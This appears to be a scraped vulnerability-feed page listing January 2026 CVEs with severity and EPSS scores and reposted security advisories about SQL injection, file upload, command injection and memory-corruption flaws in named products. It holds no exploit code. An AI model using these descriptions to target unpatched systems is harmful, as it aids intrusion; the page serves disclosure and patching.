CVE-2025-13952
(9.8 CRITICAL)

EPSS: 0.01%

updated 2026-01-26T18:32:32

1 posts

A web page that contains unusual GPU shader code is loaded from the Internet into the GPU compiler process triggers a write use-after-free crash in the GPU shader compiler library. On certain platforms, when the compiler process has system privileges this could enable further exploits on the device. The shader code contained in the web page executes a path in the compiler that held onto an out of

thehackerwire@mastodon.social at 2026-01-26T17:08:42.000Z ##

πŸ”΄ CVE-2025-13952 - Critical (9.8)

A web page that contains unusual GPU shader code is loaded from the Internet into the GPU compiler process triggers a write use-after-free crash in the GPU shader compiler library. On certain platforms, when the compiler process has system privile...

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-70982
(10.0 CRITICAL)

EPSS: 0.04%

updated 2026-01-26T18:31:31

1 posts

Incorrect access control in the importUser function of SpringBlade v4.5.0 allows attackers with low-level privileges to arbitrarily import sensitive user data.

thehackerwire@mastodon.social at 2026-01-26T18:18:00.000Z ##

πŸ”΄ CVE-2025-70982 - Critical (9.9)

Incorrect access control in the importUser function of SpringBlade v4.5.0 allows attackers with low-level privileges to arbitrarily import sensitive user data.

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-67274
(7.5 HIGH)

EPSS: 0.04%

updated 2026-01-26T18:31:31

1 posts

An issue in continuous.software aangine v.2025.2 allows a remote attacker to obtain sensitive information via the excel-integration-service template download module, integration-persistence-service job listing module, portfolio-item-service data retrieval module endpoints

thehackerwire@mastodon.social at 2026-01-26T17:59:56.000Z ##

🟠 CVE-2025-67274 - High (7.5)

An issue in continuous.software aangine v.2025.2 allows a remote attacker to obtain sensitive information via the excel-integration-service template download module, integration-persistence-service job listing module, portfolio-item-service data r...

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-52026
(7.5 HIGH)

EPSS: 0.01%

updated 2026-01-26T17:16:11.030000

1 posts

An information disclosure vulnerability exists in the /srvs/membersrv/getCashiers endpoint of the Aptsys gemscms backend platform thru 2025-05-28. This unauthenticated endpoint returns a list of cashier accounts, including names, email addresses, usernames, and passwords hashed using MD5. As MD5 is a broken cryptographic function, the hashes can be easily reversed using public tools, exposing user

thehackerwire@mastodon.social at 2026-01-26T18:16:37.000Z ##

🟠 CVE-2025-52026 - High (7.5)

An information disclosure vulnerability exists in the /srvs/membersrv/getCashiers endpoint of the Aptsys gemscms backend platform thru 2025-05-28. This unauthenticated endpoint returns a list of cashier accounts, including names, email addresses, ...

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-52025
(9.4 CRITICAL)

EPSS: 0.01%

updated 2026-01-26T17:16:10.867000

1 posts

An SQL Injection vulnerability exists in the GetServiceByRestaurantID endpoint of the Aptsys gemscms POS Platform backend thru 2025-05-28. The vulnerability arises because user input is directly inserted into a dynamic SQL query syntax without proper sanitization or parameterization. This allows an attacker to inject and execute arbitrary SQL code by submitting crafted input in the id parameter, l

thehackerwire@mastodon.social at 2026-01-26T18:16:28.000Z ##

πŸ”΄ CVE-2025-52025 - Critical (9.4)

An SQL Injection vulnerability exists in the GetServiceByRestaurantID endpoint of the Aptsys gemscms POS Platform backend thru 2025-05-28. The vulnerability arises because user input is directly inserted into a dynamic SQL query syntax without pro...

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-67264
(7.8 HIGH)

EPSS: 0.05%

updated 2026-01-26T16:15:59.017000

1 posts

An OS command injection vulnerability in the com.sprd.engineermode component in Doogee Note59, Note59 Pro, and Note59 Pro+ allows a local attacker to execute arbitrary code and escalate privileges via the EngineerMode ADB shell, due to incomplete patching of CVE-2025-31710

thehackerwire@mastodon.social at 2026-01-26T17:08:52.000Z ##

🟠 CVE-2025-67264 - High (7.8)

An OS command injection vulnerability in the com.sprd.engineermode component in Doogee Note59, Note59 Pro, and Note59 Pro+ allows a local attacker to execute arbitrary code and escalate privileges via the EngineerMode ADB shell, due to incomplete ...

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-1283
(7.8 HIGH)

EPSS: 0.01%

updated 2026-01-26T15:31:29

1 posts

A Heap-based Buffer Overflow vulnerability affecting the EPRT file reading procedure in SOLIDWORKS eDrawings from Release SOLIDWORKS 2025 through Release SOLIDWORKS 2026 could allow an attacker to execute arbitrary code while opening a specially crafted EPRT file.

thehackerwire@mastodon.social at 2026-01-26T15:00:21.000Z ##

🟠 CVE-2026-1283 - High (7.8)

A Heap-based Buffer Overflow vulnerability affecting the EPRT file reading procedure in SOLIDWORKS eDrawings from Release SOLIDWORKS 2025 through Release SOLIDWORKS 2026 could allow an attacker to execute arbitrary code while opening a specially c...

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-67968
(0 None)

EPSS: 0.02%

updated 2026-01-26T15:04:33.567000

1 posts

Unrestricted Upload of File with Dangerous Type vulnerability in InspiryThemes Real Homes CRM realhomes-crm allows Using Malicious Files.This issue affects Real Homes CRM: from n/a through <= 1.0.0.

beyondmachines1@infosec.exchange at 2026-01-25T15:01:02.000Z ##

Critical File Upload Flaw reported RealHomes CRM Plugin

RealHomes CRM plugin version 1.0.1 patches a critical file upload vulnerability (CVE-2025-67968) that allowed low-privileged users to take over WordPress sites. The flaw affected over 30,000 real estate websites by failing to validate user permissions and file types.

**If you are using RealHomes CRM plugin, update it ASAP to version 1.0.1. Attackers can easily upload web shell and take over your website. When coding, always use proper permission checks and file type validation for file uploads.**
#cybersecurity #infosec #advisory #vulnerability
beyondmachines.net/event_detai

##

CVE-2026-24367
(8.8 HIGH)

EPSS: 0.03%

updated 2026-01-26T15:04:14.850000

1 posts

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in shinetheme Traveler traveler allows Blind SQL Injection.This issue affects Traveler: from n/a through < 3.2.8.

thehackerwire@mastodon.social at 2026-01-25T07:54:22.000Z ##

🟠 CVE-2026-24367 - High (8.8)

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in shinetheme Traveler traveler allows Blind SQL Injection.This issue affects Traveler: from n/a through &lt; 3.2.8.

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-66428
(8.8 HIGH)

EPSS: 0.02%

updated 2026-01-26T15:04:14.850000

1 posts

An issue with WordPress directory names in WebPros WordPress Toolkit before 6.9.1 allows privilege escalation.

thehackerwire@mastodon.social at 2026-01-24T07:45:30.000Z ##

🟠 CVE-2025-66428 - High (8.8)

An issue with WordPress directory names in WebPros WordPress Toolkit before 6.9.1 allows privilege escalation.

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-20736
(7.5 HIGH)

EPSS: 0.03%

updated 2026-01-26T15:04:14.850000

1 posts

Gitea does not properly verify repository context when deleting attachments. A user who previously uploaded an attachment to a repository may be able to delete it after losing access to that repository by making the request through a different repository they can access.

thehackerwire@mastodon.social at 2026-01-24T00:18:01.000Z ##

🟠 CVE-2026-20736 - High (7.5)

Gitea does not properly verify repository context when deleting attachments. A user who previously uploaded an attachment to a repository may be able to delete it after losing access to that repository by making the request through a different rep...

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-20897
(9.1 CRITICAL)

EPSS: 0.03%

updated 2026-01-26T15:04:14.850000

1 posts

Gitea does not properly validate repository ownership when deleting Git LFS locks. A user with write access to one repository may be able to delete LFS locks belonging to other repositories.

thehackerwire@mastodon.social at 2026-01-24T00:17:51.000Z ##

πŸ”΄ CVE-2026-20897 - Critical (9.1)

Gitea does not properly validate repository ownership when deleting Git LFS locks. A user with write access to one repository may be able to delete LFS locks belonging to other repositories.

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-21264
(9.3 CRITICAL)

EPSS: 0.07%

updated 2026-01-26T15:04:14.850000

1 posts

Improper neutralization of input during web page generation ('cross-site scripting') in Microsoft Account allows an unauthorized attacker to perform spoofing over a network.

AAKL@infosec.exchange at 2026-01-23T17:12:39.000Z ##

If you missed this, Microsoft posted several security updates yesterday, all of them critical, affecting Microsoft accounts, Copilot, Office, Azure, and Entra: msrc.microsoft.com/update-guide

Noteworthy:

- Microsoft Account Spoofing Vulnerability: CVE-2026-21264 msrc.microsoft.com/update-guid

- Azure Entra ID Elevation of Privilege Vulnerability: CVE-2026-24305 msrc.microsoft.com/update-guid

- Azure Front Door Elevation of Privilege Vulnerability: CVE-2026-24306 msrc.microsoft.com/update-guid #infosec #Microsoft #Azure #Copilot #vulnerability

##

CVE-2026-24609
(7.5 HIGH)

EPSS: 0.11%

updated 2026-01-26T15:03:51.687000

1 posts

Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Elated-Themes Laurent laurent allows PHP Local File Inclusion.This issue affects Laurent: from n/a through <= 3.1.

thehackerwire@mastodon.social at 2026-01-23T23:18:20.000Z ##

🟠 CVE-2026-24609 - High (7.5)

Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Elated-Themes Laurent laurent allows PHP Local File Inclusion.This issue affects Laurent: from n/a through &lt;= 3.1.

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-69908
(7.5 HIGH)

EPSS: 0.01%

updated 2026-01-26T15:03:51.687000

1 posts

An unauthenticated information disclosure vulnerability in Newgen OmniApp allows attackers to enumerate valid privileged usernames via a publicly accessible client-side JavaScript resource.

thehackerwire@mastodon.social at 2026-01-23T16:45:19.000Z ##

🟠 CVE-2025-69908 - High (7.5)

An unauthenticated information disclosure vulnerability in Newgen OmniApp allows attackers to enumerate valid privileged usernames via a publicly accessible client-side JavaScript resource.

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-0710
(8.4 HIGH)

EPSS: 0.05%

updated 2026-01-26T15:03:51.687000

1 posts

A flaw was found in SIPp. A remote attacker could exploit this by sending specially crafted Session Initiation Protocol (SIP) messages during an active call. This vulnerability, a NULL pointer dereference, can cause the application to crash, leading to a denial of service. Under specific conditions, it may also allow an attacker to execute unauthorized code, compromising the system's integrity and

thehackerwire@mastodon.social at 2026-01-23T14:20:07.000Z ##

🟠 CVE-2026-0710 - High (8.4)

A flaw was found in SIPp. A remote attacker could exploit this by sending specially crafted Session Initiation Protocol (SIP) messages during an active call. This vulnerability, a NULL pointer dereference, can cause the application to crash, leadi...

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-14866
(8.8 HIGH)

EPSS: 0.01%

updated 2026-01-26T15:03:51.687000

1 posts

The Melapress Role Editor plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 1.1.1. This is due to a misconfigured capability check on the 'save_secondary_roles_field' function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to assign themselves additional roles including Administrator.

thehackerwire@mastodon.social at 2026-01-23T13:43:59.000Z ##

🟠 CVE-2025-14866 - High (8.8)

The Melapress Role Editor plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 1.1.1. This is due to a misconfigured capability check on the 'save_secondary_roles_field' function. This makes it possible ...

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-4320
(10.0 CRITICAL)

EPSS: 0.07%

updated 2026-01-26T15:03:51.687000

1 posts

Authentication Bypass by Primary Weakness, Weak Password Recovery Mechanism for Forgotten Password vulnerability in Birebirsoft Software and Technology Solutions Sufirmam allows Authentication Bypass, Password Recovery Exploitation.This issue affects Sufirmam: through 23012026.Β NOTE: The vendor was contacted early about this disclosure but did not respond in any way.

thehackerwire@mastodon.social at 2026-01-23T13:43:40.000Z ##

πŸ”΄ CVE-2025-4320 - Critical (10)

Authentication Bypass by Primary Weakness, Weak Password Recovery Mechanism for Forgotten Password vulnerability in Birebirsoft Software and Technology Solutions Sufirmam allows Authentication Bypass, Password Recovery Exploitation.This issue affe...

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-15063
(9.8 CRITICAL)

EPSS: 1.00%

updated 2026-01-26T15:03:51.687000

1 posts

Ollama MCP Server execAsync Command Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Ollama MCP Server. Authentication is not required to exploit this vulnerability. The specific flaw exists within the implementation of the execAsync method. The issue results from the lack of proper validation of a use

thehackerwire@mastodon.social at 2026-01-23T13:12:20.000Z ##

πŸ”΄ CVE-2025-15063 - Critical (9.8)

Ollama MCP Server execAsync Command Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Ollama MCP Server. Authentication is not required to exploit this ...

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-15062
(7.8 HIGH)

EPSS: 0.05%

updated 2026-01-26T15:03:51.687000

1 posts

Trimble SketchUp SKP File Parsing Use-After-Free Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Trimble SketchUp. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of SKP files. The iss

thehackerwire@mastodon.social at 2026-01-23T13:12:10.000Z ##

🟠 CVE-2025-15062 - High (7.8)

Trimble SketchUp SKP File Parsing Use-After-Free Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Trimble SketchUp. User interaction is required to exploit this ...

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-0762
(8.1 HIGH)

EPSS: 0.36%

updated 2026-01-26T15:03:51.687000

1 posts

GPT Academic stream_daas Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GPT Academic. Interaction with a malicious DAAS server is required to exploit this vulnerability but attack vectors may vary depending on the implementation. The specific flaw exists within the stream_daas

thehackerwire@mastodon.social at 2026-01-23T11:03:31.000Z ##

🟠 CVE-2026-0762 - High (8.1)

GPT Academic stream_daas Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GPT Academic. Interaction with a malicious DAAS serve...

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-1284
(7.8 HIGH)

EPSS: 0.01%

updated 2026-01-26T15:03:33.357000

1 posts

An Out-Of-Bounds Write vulnerability affecting the EPRT file reading procedure in SOLIDWORKS eDrawings from Release SOLIDWORKS 2025 through Release SOLIDWORKS 2026 could allow an attacker to execute arbitrary code while opening a specially crafted EPRT file.

thehackerwire@mastodon.social at 2026-01-26T15:00:11.000Z ##

🟠 CVE-2026-1284 - High (7.8)

An Out-Of-Bounds Write vulnerability affecting the EPRT file reading procedure in SOLIDWORKS eDrawings from Release SOLIDWORKS 2025 through Release SOLIDWORKS 2026 could allow an attacker to execute arbitrary code while opening a specially crafted...

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-13374
(9.8 CRITICAL)

EPSS: 0.14%

updated 2026-01-26T15:03:33.357000

1 posts

The Kalrav AI Agent plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the kalrav_upload_file AJAX action in all versions up to, and including, 2.3.3. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.

1 repos

https://github.com/d0n601/CVE-2025-13374

thehackerwire@mastodon.social at 2026-01-24T11:35:24.000Z ##

πŸ”΄ CVE-2025-13374 - Critical (9.8)

The Kalrav AI Agent plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the kalrav_upload_file AJAX action in all versions up to, and including, 2.3.3. This makes it possible for unauthenticated atta...

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-1257
(7.5 HIGH)

EPSS: 0.07%

updated 2026-01-26T15:03:33.357000

1 posts

The Administrative Shortcodes plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 0.3.4 via the 'slug' attribute of the 'get_template' shortcode. This is due to insufficient path validation on user-supplied input passed to the get_template_part() function. This makes it possible for authenticated attackers, with Contributor-level access and above, to in

thehackerwire@mastodon.social at 2026-01-24T08:29:03.000Z ##

🟠 CVE-2026-1257 - High (7.5)

The Administrative Shortcodes plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 0.3.4 via the 'slug' attribute of the 'get_template' shortcode. This is due to insufficient path validation on user-supp...

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-24412
(8.8 HIGH)

EPSS: 0.06%

updated 2026-01-26T15:03:33.357000

1 posts

iccDEV provides libraries and tools for interacting with, manipulating, and applying ICC color management profiles. Versions 2.3.1.1 and below have aHeap Buffer Overflow vulnerability in the CIccTagXmlSegmentedCurve::ToXml() function. This occurs when user-controllable input is unsafely incorporated into ICC profile data or other structured binary blobs. Successful exploitation may allow an attack

thehackerwire@mastodon.social at 2026-01-24T03:00:32.000Z ##

🟠 CVE-2026-24412 - High (8.8)

iccDEV provides libraries and tools for interacting with, manipulating, and applying ICC color management profiles. Versions 2.3.1.1 and below have aHeap Buffer Overflow vulnerability in the CIccTagXmlSegmentedCurve::ToXml() function. This occurs ...

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-1386
(6.0 MEDIUM)

EPSS: 0.01%

updated 2026-01-26T15:03:33.357000

1 posts

A UNIX symbolic link following issue in the jailer component in Firecracker version v1.13.1 and earlier and 1.14.0 on Linux may allow a local host user with write access to the pre-created jailer directories to overwrite arbitrary host files via a symlink attack during the initialization copy at jailer startup, if the jailer is executed with root privileges. To mitigate this issue, users should

linux@activitypub.awakari.com at 2026-01-23T20:51:09.000Z ## CVE-2026-1386 - Arbitrary Host File Overwrite via Symlink in Firecracker Jailer Bulletin ID: 2026-003-AWS Scope: AWS Content Type: Important (requires attention) Publication Date: 2026/01/23 12:30 ...


Origin | Interest | Match ##

CVE-2025-70986
(7.5 HIGH)

EPSS: 0.01%

updated 2026-01-26T15:03:33.357000

1 posts

Incorrect access control in the selectDept function of RuoYi v4.8.2 allows unauthorized attackers to arbitrarily access sensitive department data.

thehackerwire@mastodon.social at 2026-01-23T20:24:18.000Z ##

🟠 CVE-2025-70986 - High (7.5)

Incorrect access control in the selectDept function of RuoYi v4.8.2 allows unauthorized attackers to arbitrarily access sensitive department data.

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-1428
(8.8 HIGH)

EPSS: 0.29%

updated 2026-01-26T09:30:24

1 posts

Single Sign-On Portal System developed by WellChoose has a OS Command Injection vulnerability, allowing authenticated remote attackers to inject arbitrary OS commands and execute them on the server.

thehackerwire@mastodon.social at 2026-01-26T09:26:02.000Z ##

🟠 CVE-2026-1428 - High (8.8)

Single Sign-On Portal System developed by WellChoose has a OS Command Injection vulnerability, allowing authenticated remote attackers to inject arbitrary OS commands and execute them on the server.

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-1427
(8.8 HIGH)

EPSS: 0.09%

updated 2026-01-26T09:30:24

1 posts

Single Sign-On Portal System developed by WellChoose has a OS Command Injection vulnerability, allowing authenticated remote attackers to inject arbitrary OS commands and execute them on the server.

thehackerwire@mastodon.social at 2026-01-26T09:00:13.000Z ##

🟠 CVE-2026-1427 - High (8.8)

Organization Portal System developed by WellChoose has a OS Command Injection vulnerability, allowing authenticated remote attackers to inject arbitrary OS commands and execute them on the server.

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-1420
(8.8 HIGH)

EPSS: 0.09%

updated 2026-01-26T06:30:34

1 posts

A flaw has been found in Tenda AC23 16.03.07.52. This impacts an unknown function of the file /goform/WifiExtraSet. This manipulation of the argument wpapsk_crypto causes buffer overflow. Remote exploitation of the attack is possible. The exploit has been published and may be used.

thehackerwire@mastodon.social at 2026-01-26T06:20:27.000Z ##

🟠 CVE-2026-1420 - High (8.8)

A flaw has been found in Tenda AC23 16.03.07.52. This impacts an unknown function of the file /goform/WifiExtraSet. This manipulation of the argument wpapsk_crypto causes buffer overflow. Remote exploitation of the attack is possible. The exploit ...

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-0911
(7.5 HIGH)

EPSS: 0.07%

updated 2026-01-24T15:30:21

1 posts

The Hustle – Email Marketing, Lead Generation, Optins, Popups plugin for WordPress is vulnerable to arbitrary file uploads due to incorrect file type validation in the action_import_module() function in all versions up to, and including, 7.8.9.2. This makes it possible for authenticated attackers, with a lower-privileged role (e.g., Subscriber-level access and above), to upload arbitrary files on

thehackerwire@mastodon.social at 2026-01-24T13:59:54.000Z ##

🟠 CVE-2026-0911 - High (7.5)

The Hustle – Email Marketing, Lead Generation, Optins, Popups plugin for WordPress is vulnerable to arbitrary file uploads due to incorrect file type validation in the action_import_module() function in all versions up to, and including, 7.8.9.2...

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-69180
(8.8 HIGH)

EPSS: 0.03%

updated 2026-01-23T22:36:54

1 posts

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in themepassion Ultra Portfolio ultra-portfolio allows Blind SQL Injection.This issue affects Ultra Portfolio: from n/a through <= 6.7.

thehackerwire@mastodon.social at 2026-01-25T07:54:31.000Z ##

🟠 CVE-2025-69180 - High (8.8)

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in themepassion Ultra Portfolio ultra-portfolio allows Blind SQL Injection.This issue affects Ultra Portfolio: from n/a through &lt;= 6.7.

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-24608
(7.5 HIGH)

EPSS: 0.11%

updated 2026-01-23T22:36:54

1 posts

Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Elated-Themes Laurent Core laurent-core allows PHP Local File Inclusion.This issue affects Laurent Core: from n/a through <= 2.4.1.

thehackerwire@mastodon.social at 2026-01-23T23:18:11.000Z ##

🟠 CVE-2026-24608 - High (7.5)

Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Elated-Themes Laurent Core laurent-core allows PHP Local File Inclusion.This issue affects Laurent Core: from n/a through &lt;...

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-24635
(7.5 HIGH)

EPSS: 0.11%

updated 2026-01-23T22:36:54

1 posts

Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in DevsBlink EduBlink Core edublink-core allows PHP Local File Inclusion.This issue affects EduBlink Core: from n/a through <= 2.0.7.

thehackerwire@mastodon.social at 2026-01-23T23:18:01.000Z ##

🟠 CVE-2026-24635 - High (7.5)

Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in DevsBlink EduBlink Core edublink-core allows PHP Local File Inclusion.This issue affects EduBlink Core: from n/a through &lt;=...

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-69907
(7.5 HIGH)

EPSS: 0.03%

updated 2026-01-23T22:35:52

1 posts

An unauthenticated information disclosure vulnerability exists in Newgen OmniDocs due to missing authentication and access control on the /omnidocs/GetListofCabinet API endpoint. A remote attacker can access this endpoint without valid credentials to retrieve sensitive internal configuration information, including cabinet names and database-related metadata. This allows unauthorized enumeration of

thehackerwire@mastodon.social at 2026-01-24T00:15:56.000Z ##

🟠 CVE-2025-69907 - High (7.5)

An unauthenticated information disclosure vulnerability exists in Newgen OmniDocs due to missing authentication and access control on the /omnidocs/GetListofCabinet API endpoint. A remote attacker can access this endpoint without valid credentials...

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-56005
(9.8 CRITICAL)

EPSS: 0.36%

updated 2026-01-23T22:35:51

1 posts

An undocumented and unsafe feature in the PLY (Python Lex-Yacc) library 3.11 allows Remote Code Execution (RCE) via the `picklefile` parameter in the `yacc()` function. This parameter accepts a `.pkl` file that is deserialized with `pickle.load()` without validation. Because `pickle` allows execution of embedded code via `__reduce__()`, an attacker can achieve code execution by passing a malicious

1 repos

#search_error

beyondmachines1@infosec.exchange at 2026-01-27T08:01:02.000Z ##

Critical Remote Code Execution Vulnerability Reported in Python PLY Library

A critical remote code execution vulnerability (CVE-2025-56005) was reported in the Python PLY library version 3.11 due to an undocumented and unsafe use of the pickle module. Attackers can exploit this flaw to run arbitrary code during parser initialization by providing a malicious pickle file.

**If you use Python PLY library, search and remove any use of the picklefile parameter - it's vulnerable with no fix available. Regenerate parser tables at startup instead and lock down write access to prevent attackers from planting malicious files.**
#cybersecurity #infosec #advisory #vulnerability
beyondmachines.net/event_detai

##

CVE-2025-66720
(7.5 HIGH)

EPSS: 0.01%

updated 2026-01-23T21:31:51

1 posts

Null pointer dereference in free5gc pcf 1.4.0 in file internal/sbi/processor/ampolicy.go in function HandleDeletePoliciesPolAssoId.

thehackerwire@mastodon.social at 2026-01-23T20:00:41.000Z ##

🟠 CVE-2025-66720 - High (7.5)

Null pointer dereference in free5gc pcf 1.4.0 in file internal/sbi/processor/ampolicy.go in function HandleDeletePoliciesPolAssoId.

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-67229
(9.8 CRITICAL)

EPSS: 0.01%

updated 2026-01-23T21:31:51

1 posts

An improper certificate validation vulnerability exists in ToDesktop Builder v0.32.1 This vulnerability allows an unauthenticated, on-path attacker to spoof backend responses by exploiting insufficient certificate validation.

thehackerwire@mastodon.social at 2026-01-23T20:00:28.000Z ##

πŸ”΄ CVE-2025-67229 - Critical (9.8)

An improper certificate validation vulnerability exists in ToDesktop Builder v0.32.1 This vulnerability allows an unauthenticated, on-path attacker to spoof backend responses by exploiting insufficient certificate validation.

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-66719
(9.1 CRITICAL)

EPSS: 0.03%

updated 2026-01-23T21:31:50

1 posts

An issue was discovered in Free5gc NRF 1.4.0. In the access-token generation logic of free5GC, the AccessTokenScopeCheck() function in file internal/sbi/processor/access_token.go bypasses all scope validation when the attacker uses a crafted targetNF value. This allows attackers to obtain an access token with any arbitrary scope.

thehackerwire@mastodon.social at 2026-01-23T20:25:16.000Z ##

πŸ”΄ CVE-2025-66719 - Critical (9.1)

An issue was discovered in Free5gc NRF 1.4.0. In the access-token generation logic of free5GC, the AccessTokenScopeCheck() function in file internal/sbi/processor/access_token.go bypasses all scope validation when the attacker uses a crafted targe...

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2024-37079
(9.8 CRITICAL)

EPSS: 79.02%

updated 2026-01-23T21:31:35

7 posts

vCenter Server contains a heap-overflow vulnerability in the implementation of the DCERPC protocol. A malicious actor with network access to vCenter Server may trigger this vulnerability by sending a specially crafted network packet potentially leading to remote code execution.

jbhall56@infosec.exchange at 2026-01-27T11:34:45.000Z ##

Tracked as CVE-2024-37079 (CVSS score of 9.8), the flaw is described as an out-of-bounds write issue in the Distributed Computing Environment/Remote Procedure Calls (DCERPC) protocol implementation of vCenter Server. securityweek.com/2024-vmware-f

##

benzogaga33@mamot.fr at 2026-01-26T16:40:02.000Z ##

VMware vCenter : la CVE-2024-37079 est activement exploitΓ©e d’aprΓ¨s la CISA it-connect.fr/vmware-vcenter-l #ActuCybersΓ©curitΓ© #CybersΓ©curitΓ© #VulnΓ©rabilitΓ© #VMware

##

agowa338@chaos.social at 2026-01-26T08:45:26.000Z ##

As it is public now* I'm able to talk about it.

Check your VMware infrastructure. CVE-2024-37079 is known to have been exploited in the wild.

> UPDATE: Broadcom has information to suggest that exploitation of CVE-2024-37079 has occurred in the wild.

euvd.enisa.europa.eu/vulnerabi
euvd.enisa.europa.eu/vulnerabi
euvd.enisa.europa.eu/vulnerabi

support.broadcom.com/web/ecx/s

#infosec #itsec #itsecurity

* technically since Friday.

##

jbhall56@infosec.exchange at 2026-01-24T15:24:41.000Z ##

